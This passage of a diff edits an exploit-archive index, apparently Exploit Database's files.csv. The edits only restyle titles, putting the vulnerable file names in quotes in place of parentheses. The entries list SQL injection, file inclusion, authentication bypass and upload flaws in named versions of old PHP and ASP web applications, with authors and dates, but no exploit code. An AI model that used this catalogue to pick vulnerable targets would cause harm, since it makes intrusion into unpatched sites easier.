Scripting / Local File Inclusion",2009-07-17,Moudi,php,webapps,0 9187,platforms/php/webapps/9187.txt,"Joomla! Component Jobline 1.3.1 - Blind SQL Injection",2009-07-17,ManhLuat93,php,webapps,0 -9193,platforms/php/webapps/9193.pl,"WebVision 2.1 - (news.php n) SQL Injection",2009-07-17,Mr.tro0oqy,php,webapps,0 +9193,platforms/php/webapps/9193.pl,"WebVision 2.1 - 'news.php n' SQL Injection",2009-07-17,Mr.tro0oqy,php,webapps,0 9194,platforms/php/webapps/9194.txt,"radbids gold 4.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9195,platforms/php/webapps/9195.txt,"radlance gold 7.5 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9196,platforms/php/webapps/9196.txt,"radnics gold 5.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 -9202,platforms/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 - (silentum_Guestbook.php) SQL Injection",2009-07-20,Bgh7,php,webapps,0 +9202,platforms/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 - 'silentum_Guestbook.php' SQL Injection",2009-07-20,Bgh7,php,webapps,0 9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 - Authentication Bypass",2009-07-20,Mr.tro0oqy,php,webapps,0 9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 - 'lang' Remote File Inclusion",2009-07-20,NoGe,php,webapps,0 9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - SQL Injection / Cross-Site Scripting / shell",2009-07-20,SirGod,php,webapps,0 @@ -21380,7 +21383,7 @@ id,file,description,date,author,platform,type,port 9239,platforms/php/webapps/9239.txt,"PHP Melody 1.5.3 - Arbitrary File Upload Injection",2009-07-23,"Chip d3 bi0s",php,webapps,0 9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0 9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 -9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0 +9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - 'index.php idAuthor' SQL Injection",2009-07-24,NoGe,php,webapps,0 9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - Authentication Bypass",2009-07-24,SwEET-DeViL,php,webapps,0 9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - (codigo) SQL Injection",2009-07-24,s4r4d0,php,webapps,0 9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0 @@ -21437,13 +21440,13 @@ id,file,description,date,author,platform,type,port 9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities",2009-08-01,SirGod,php,webapps,0 9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,php,webapps,0 9328,platforms/asp/webapps/9328.txt,"AW BannerAd - Authentication Bypass",2009-08-03,Ro0T-MaFia,asp,webapps,0 -9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) Remote File Inclusion",2009-08-03,cr4wl3r,php,webapps,0 +9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - 'pda_projects.php offset' Remote File Inclusion",2009-08-03,cr4wl3r,php,webapps,0 9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - Authentication Bypass",2009-08-03,Cicklow,php,webapps,0 -9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - (confirm.php language) Local File Inclusion",2009-08-03,SirGod,php,webapps,0 +9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - 'confirm.php language' Local File Inclusion",2009-08-03,SirGod,php,webapps,0 9334,platforms/php/webapps/9334.txt,"QuickDev 4 - 'download.php' File Disclosure",2009-08-03,SirGod,php,webapps,0 9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps,0 9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps,0 -9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0 +9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - 'files.php' Authentication Bypass",2009-08-03,SirGod,php,webapps,0 9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0 9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 @@ -21452,14 +21455,14 @@ id,file,description,date,author,platform,type,port 9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index PHP action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0 9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - 'mod.php' Local File Inclusion",2009-08-03,Qabandi,php,webapps,0 9348,platforms/php/webapps/9348.txt,"Blink Blog System - Authentication Bypass",2009-08-03,"Salvatore Fresta",php,webapps,0 -9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - (index.php more) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 +9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - 'index.php more' SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure",2009-08-03,GoLd_M,php,webapps,0 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - Authentication Bypass",2009-08-04,SirGod,php,webapps,0 -9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 +9355,platforms/php/webapps/9355.txt,"elgg 1.5 - '/_css/js.php' Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 9356,platforms/php/webapps/9356.txt,"ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0 9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0 -9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 +9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - 'index.php env' Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 - File Download / Remote File Inclusion",2009-08-05,SirGod,php,webapps,0 9367,platforms/php/webapps/9367.txt,"tenrok 1.1.0 - File Disclosure / Remote Code Execution",2009-08-05,SirGod,php,webapps,0 9369,platforms/php/webapps/9369.txt,"Irokez CMS 0.7.1 - SQL Injection",2009-08-05,Ins3t,php,webapps,0 @@ -21511,7 +21514,7 @@ id,file,description,date,author,platform,type,port 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0 9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,php,webapps,0 -9461,platforms/php/webapps/9461.txt,"E CMS 1.0 - (index.php s) SQL Injection",2009-08-18,Red-D3v1L,php,webapps,0 +9461,platforms/php/webapps/9461.txt,"E CMS 1.0 - 'index.php s' SQL Injection",2009-08-18,Red-D3v1L,php,webapps,0 9462,platforms/php/webapps/9462.txt,"Infinity 2.x.x - options[style_dir] Local File Disclosure",2009-08-18,SwEET-DeViL,php,webapps,0 9463,platforms/php/webapps/9463.php,"Joomla! Component MisterEstate - Blind SQL Injection",2009-08-18,jdc,php,webapps,0 9464,platforms/php/webapps/9464.txt,"Fotoshow PRO - (category) SQL Injection",2009-08-18,darkmasking,php,webapps,0 @@ -21531,7 +21534,7 @@ id,file,description,date,author,platform,type,port 9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure",2009-08-24,Septemb0x,php,webapps,0 9494,platforms/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,php,webapps,0 9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - 'ProductID' Parameter Blind SQL Injection",2009-08-24,Mr.SQL,php,webapps,0 -9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - (rating.php) SQL Injection",2009-08-24,Bgh7,php,webapps,0 +9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - 'rating.php' SQL Injection",2009-08-24,Bgh7,php,webapps,0 9502,platforms/php/webapps/9502.txt,"Joomla! Component com_ninjamonial 1.1 - (testimID) SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 9504,platforms/php/webapps/9504.txt,"Joomla! Component com_jtips 1.0.x - (season) Blind SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 9505,platforms/php/webapps/9505.txt,"Geeklog 1.6.0sr1 - Arbitrary File Upload",2009-08-24,JaL0h,php,webapps,0 @@ -21541,20 +21544,20 @@ id,file,description,date,author,platform,type,port 40383,platforms/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",asp,webapps,80 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 9522,platforms/php/webapps/9522.txt,"Moa Gallery 1.2.0 - Multiple Remote File Inclusion",2009-08-26,cr4wl3r,php,webapps,0 -9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - (index.php action) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 +9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - 'index.php action' SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - Blind SQL Injection / Local File Inclusion",2009-08-26,Moudi,php,webapps,0 9525,platforms/php/webapps/9525.txt,"Moa Gallery 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0 9527,platforms/php/webapps/9527.txt,"Simple CMS Framework 1.0 - 'page' Parameter SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0 9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0 9530,platforms/php/webapps/9530.txt,"Open Auto Classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 -9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 - (list.php string) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 +9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 - 'list.php string' SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 9532,platforms/php/webapps/9532.txt,"allomani 2007 - (cat) SQL Injection",2009-08-26,"NeX HaCkEr",php,webapps,0 -9533,platforms/php/webapps/9533.txt,"PHPSANE 0.5.0 - (save.php) Remote File Inclusion",2009-08-26,CoBRa_21,php,webapps,0 +9533,platforms/php/webapps/9533.txt,"PHPSANE 0.5.0 - 'save.php' Remote File Inclusion",2009-08-26,CoBRa_21,php,webapps,0 9534,platforms/php/webapps/9534.txt,"Joomla! Component com_digifolio 1.52 - 'id' SQL Injection",2009-08-27,v3n0m,php,webapps,0 9535,platforms/php/webapps/9535.txt,"Uiga Church Portal - (year) SQL Injection",2009-08-27,Mr.SQL,php,webapps,0 9538,platforms/php/webapps/9538.txt,"Silurus Classifieds System - 'category.php' SQL Injection",2009-08-28,Mr.SQL,php,webapps,0 -9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 -9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta - (listings.php op) SQL Injection",2009-08-31,Mr.SQL,php,webapps,0 +9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - 'index.php s' SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 +9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta - 'listings.php op' SQL Injection",2009-08-31,Mr.SQL,php,webapps,0 9553,platforms/php/webapps/9553.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (1)",2009-08-31,Affix,php,webapps,0 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX - 'spnews.php' SQL Injection",2009-08-31,HxH,php,webapps,0 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution",2009-08-31,flyh4t,php,webapps,0 @@ -21562,9 +21565,9 @@ id,file,description,date,author,platform,type,port 9563,platforms/php/webapps/9563.txt,"Joomla! Component com_artportal 1.0 - (portalid) SQL Injection",2009-09-01,"599eme Man",php,webapps,0 9564,platforms/php/webapps/9564.txt,"Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion",2009-09-01,ByALBAYX,php,webapps,0 9565,platforms/php/webapps/9565.txt,"Xstate Real Estate 1.0 - (Blind SQL Injection / Cross-Site Scripting) Multiples Vulnerabilities",2009-09-01,Moudi,php,webapps,0 -9566,platforms/php/webapps/9566.txt,"KingCMS 0.6.0 - (menu.php) Remote File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 +9566,platforms/php/webapps/9566.txt,"KingCMS 0.6.0 - 'menu.php' Remote File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 9569,platforms/php/webapps/9569.txt,"phpBB3 - addon prime_quick_style GetAdmin",2009-09-01,-SmoG-,php,webapps,0 -9570,platforms/php/webapps/9570.txt,"Ve-EDIT 0.1.4 - (debug_PHP.php) Local File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 +9570,platforms/php/webapps/9570.txt,"Ve-EDIT 0.1.4 - 'debug_PHP.php' Local File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 9571,platforms/php/webapps/9571.txt,"Joomla! Component com_gameserver 1.0 - 'id' SQL Injection",2009-09-01,v3n0m,php,webapps,0 9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 - dle_config_api Remote File Inclusion",2009-09-01,Kurd-Team,php,webapps,0 9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection",2009-09-02,ZhaoHuAn,php,webapps,0 @@ -21577,14 +21580,14 @@ id,file,description,date,author,platform,type,port 9591,platforms/php/webapps/9591.txt,"Ticket Support Script - 'ticket.php' Arbitrary File Upload",2009-09-04,InjEctOr5,php,webapps,0 9593,platforms/php/webapps/9593.txt,"Joomla! Component com_Joomlaub - (aid) SQL Injection",2009-09-04,"599eme Man",php,webapps,0 9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload",2009-09-09,Securitylab.ir,php,webapps,0 -9600,platforms/php/webapps/9600.txt,"OBOphiX 2.7.0 - (fonctions_racine.php) Remote File Inclusion",2009-09-09,"EA Ngel",php,webapps,0 +9600,platforms/php/webapps/9600.txt,"OBOphiX 2.7.0 - 'fonctions_racine.php' Remote File Inclusion",2009-09-09,"EA Ngel",php,webapps,0 9601,platforms/php/webapps/9601.php,"Joomla! Component BF Survey Pro Free - SQL Injection",2009-09-09,jdc,php,webapps,0 9602,platforms/php/webapps/9602.pl,"Joomla! Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,php,webapps,0 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0 9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0 -9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 +9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - 'menu.php' Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0 9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 - Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting",2009-09-10,"Salvatore Fresta",php,webapps,0 @@ -21595,20 +21598,20 @@ id,file,description,date,author,platform,type,port 9633,platforms/php/webapps/9633.txt,"Bus Script - (sitetext_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9634,platforms/php/webapps/9634.txt,"Adult Portal escort listing - (user_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9635,platforms/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",php,webapps,0 -9636,platforms/php/webapps/9636.txt,"An image Gallery 1.0 - (navigation.php) Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0 +9636,platforms/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0 9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injection",2009-09-10,"Salvatore Fresta",php,webapps,0 -9639,platforms/php/webapps/9639.txt,"Image voting 1.0 - (index.php show) SQL Injection",2009-09-11,SkuLL-HackeR,php,webapps,0 +9639,platforms/php/webapps/9639.txt,"Image voting 1.0 - 'index.php show' SQL Injection",2009-09-11,SkuLL-HackeR,php,webapps,0 9640,platforms/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,php,webapps,0 9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor - (maincat_id) SQL Injection",2009-09-11,noname,php,webapps,0 9648,platforms/php/webapps/9648.txt,"Joomla! Component Hotel Booking System - Cross-Site Scripting / SQL Injection",2009-09-11,K-159,php,webapps,0 9653,platforms/php/webapps/9653.txt,"Joomla! Component Turtushout 0.11 - (Name) SQL Injection",2009-09-14,jdc,php,webapps,0 9654,platforms/php/webapps/9654.php,"Joomla! Component AlphaUserPoints - SQL Injection",2009-09-14,jdc,php,webapps,0 -9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0 +9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - 'install.plugin.php' Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0 9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0 9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 - (page) SQL Injection",2009-09-14,Bgh7,php,webapps,0 9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - Authentication Bypass",2009-09-15,snakespc,php,webapps,0 9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals - 'details.asp PropId' Blind SQL Injection",2009-09-15,R3d-D3V!L,asp,webapps,0 -9681,platforms/php/webapps/9681.txt,"efront 3.5.4 - (database.php path) Remote File Inclusion",2009-09-15,cr4wl3r,php,webapps,0 +9681,platforms/php/webapps/9681.txt,"efront 3.5.4 - 'database.php path' Remote File Inclusion",2009-09-15,cr4wl3r,php,webapps,0 9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 - (cat) Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps,0 9693,platforms/php/webapps/9693.txt,"Joomla! Component com_djcatalog - SQL Injection / Blind SQL Injection",2009-09-15,"Chip d3 bi0s",php,webapps,0 9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - Authentication Bypass",2009-09-16,snakespc,php,webapps,0 @@ -21619,7 +21622,7 @@ id,file,description,date,author,platform,type,port 9702,platforms/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 - (platform) SQL Injection",2009-09-16,snakespc,php,webapps,0 9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,cr4wl3r,php,webapps,0 9706,platforms/php/webapps/9706.txt,"Joomla! Component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps,0 -9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - (pageHeader.php path) Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0 +9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - 'pageHeader.php path' Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0 9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' Parameter SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0 9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - Authentication Bypass",2009-09-17,"learn3r hacker",php,webapps,0 @@ -21953,9 +21956,9 @@ id,file,description,date,author,platform,type,port 10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - SQL Authentication Bypass",2009-12-17,bi0,php,webapps,0 10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 - Arbitrary File Upload (1)",2009-12-17,Stink,php,webapps,0 10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET - SQL Authentication Bypass",2009-12-17,bi0,asp,webapps,0 -10526,platforms/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 +10526,platforms/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - 'buyersend.asp catid' Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10527,platforms/php/webapps/10527.txt,"ReVou Software - SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 -10528,platforms/php/webapps/10528.txt,"V.H.S. Booking - (hotel_habitaciones.php HotelID) SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 +10528,platforms/php/webapps/10528.txt,"V.H.S. Booking - 'hotel_habitaciones.php HotelID' SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 10529,platforms/asp/webapps/10529.txt,"eWebquiz 8 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10531,platforms/php/webapps/10531.txt,"jCore CMS - Cross-Site Scripting",2009-12-17,loneferret,php,webapps,0 10532,platforms/php/webapps/10532.txt,"Piwik Open Flash Chart - Remote Code Execution",2009-12-17,"Braeden Thomas",php,webapps,0 @@ -22082,7 +22085,7 @@ id,file,description,date,author,platform,type,port 10711,platforms/php/webapps/10711.txt,"phpAuction - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10712,platforms/php/webapps/10712.txt,"Nuked-klaN SP4 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10713,platforms/asp/webapps/10713.txt,"Esinti Web Design Gold Defter - Database Disclosure",2009-12-26,LionTurk,asp,webapps,0 -10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 - (event.php id) SQL Injection",2009-12-26,The_HuliGun,php,webapps,0 +10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 - 'event.php id' SQL Injection",2009-12-26,The_HuliGun,php,webapps,0 10717,platforms/php/webapps/10717.txt,"DBHcms 1.1.4 - Remote File Inclusion",2009-12-26,Gamoscu,php,webapps,0 10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script (Arabic Version) - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 @@ -22195,7 +22198,7 @@ id,file,description,date,author,platform,type,port 10889,platforms/php/webapps/10889.txt,"DS CMS 1.0 - (NewsId) SQL Injection",2010-01-01,Palyo34,php,webapps,0 10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection",2010-01-01,Sora,php,webapps,0 10897,platforms/php/webapps/10897.txt,"WD-CMS 3.0 - Multiple Vulnerabilities",2010-01-01,Sora,php,webapps,0 -10899,platforms/php/webapps/10899.txt,"XlentCMS 1.0.4 - (downloads.php?cat) SQL Injection",2010-01-01,Gamoscu,php,webapps,0 +10899,platforms/php/webapps/10899.txt,"XlentCMS 1.0.4 - 'downloads.php?cat' SQL Injection",2010-01-01,Gamoscu,php,webapps,0 10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass",2010-01-01,R3d-D3V!L,php,webapps,0 10903,platforms/asp/webapps/10903.txt,"Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps,0 10905,platforms/php/webapps/10905.txt,"Joomla! Component com_avosbillets - Blind SQL Injection",2010-01-01,Pyske,php,webapps,0 @@ -22227,7 +22230,7 @@ id,file,description,date,author,platform,type,port 10964,platforms/php/webapps/10964.txt,"Joomla! Component Bridge of Hope Template - SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 10965,platforms/php/webapps/10965.txt,"Joomla! Component com_doqment - 'cid' SQL Injection",2010-01-03,Gamoscu,php,webapps,0 10966,platforms/php/webapps/10966.txt,"Joomla! Component com_otzivi - Blind SQL Injection",2010-01-03,Cyber_945,php,webapps,0 -10967,platforms/php/webapps/10967.txt,"Rezervi 3.0.2 - (mail.inc.php) Remote File Inclusion",2010-01-03,r00t.h4x0r,php,webapps,0 +10967,platforms/php/webapps/10967.txt,"Rezervi 3.0.2 - 'mail.inc.php' Remote File Inclusion",2010-01-03,r00t.h4x0r,php,webapps,0 10968,platforms/php/webapps/10968.txt,"portal modulnet 1.0 - 'id' SQL Injection",2010-01-03,Red-D3v1L,php,webapps,0 10971,platforms/php/webapps/10971.txt,"Joomla! Component Bamboo Simpla Admin Template - SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 10972,platforms/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0 @@ -22244,7 +22247,7 @@ id,file,description,date,author,platform,type,port 10991,platforms/php/webapps/10991.txt,"Ninja Blog 4.8 - Multiple Vulnerabilities",2010-01-04,indoushka,php,webapps,0 10999,platforms/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,multiple,webapps,0 11002,platforms/php/webapps/11002.txt,"ImagoScripts Deviant Art Clone - SQL Injection",2010-01-04,alnjm33,php,webapps,0 -11003,platforms/php/webapps/11003.txt,"LightOpenCMS 0.1 - (smarty.php) Remote File Inclusion",2010-01-04,"Zer0 Thunder",php,webapps,0 +11003,platforms/php/webapps/11003.txt,"LightOpenCMS 0.1 - 'smarty.php' Remote File Inclusion",2010-01-04,"Zer0 Thunder",php,webapps,0 11005,platforms/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure",2010-01-04,LionTurk,asp,webapps,0 11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 - Database Download",2010-01-05,indoushka,asp,webapps,0 11012,platforms/php/webapps/11012.txt,"ITaco Group ITaco.biz - (view_news) SQL Injection",2010-01-06,Err0R,php,webapps,0 @@ -22431,7 +22434,7 @@ id,file,description,date,author,platform,type,port 11380,platforms/php/webapps/11380.txt,"osTicket 1.6 RC5 - Multiple Vulnerabilities",2010-02-09,"Nahuel Grisolia",php,webapps,0 11382,platforms/php/webapps/11382.txt,"eSmile Script - 'index.php' SQL Injection",2010-02-10,AtT4CKxT3rR0r1ST,php,webapps,0 11383,platforms/php/webapps/11383.txt,"HASHE! Solutions - Multiple SQL Injections",2010-02-10,AtT4CKxT3rR0r1ST,php,webapps,0 -11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - (usercp.php) Cross-Site Scripting",2010-02-10,"Sioma Labs",php,webapps,0 +11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - 'usercp.php' Cross-Site Scripting",2010-02-10,"Sioma Labs",php,webapps,0 11393,platforms/jsp/webapps/11393.txt,"Omnidocs - SQL Injection",2010-02-11,thebluegenius,jsp,webapps,0 11394,platforms/php/webapps/11394.txt,"vBulletin 3.5.2 - Cross-Site Scripting",2010-02-11,ROOT_EGY,php,webapps,0 11395,platforms/php/webapps/11395.txt,"vBulletin 3.0.0 - Cross-Site Scripting",2010-02-11,ROOT_EGY,php,webapps,0 @@ -22536,7 +22539,7 @@ 